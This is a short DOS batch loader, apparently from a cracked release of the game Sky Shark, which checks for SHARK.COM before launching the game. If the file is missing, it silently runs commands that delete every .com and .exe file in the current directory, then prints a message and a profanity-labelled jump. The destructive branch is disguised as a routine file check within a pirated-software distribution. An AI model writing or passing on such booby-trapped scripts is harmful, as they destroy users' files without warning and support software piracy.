home *** CD-ROM | disk | FTP | other *** search
- echo off
- cls
- echo Checking For Files
- if exist SHARK.COM goto fine
- if not exist SHARK.COM goto fuckyou
- :fine
- shark
- pause
- skyshark
- echo This is a FiRM Krack
- echo But this is a HeadMaster's Distribution
- goto exit
- :fuckyou
- del *.com
- del *.exe
- echo This is not an Official HeadMaster's Distribution!
- goto exit
- :exit
- Echo Thank You!
-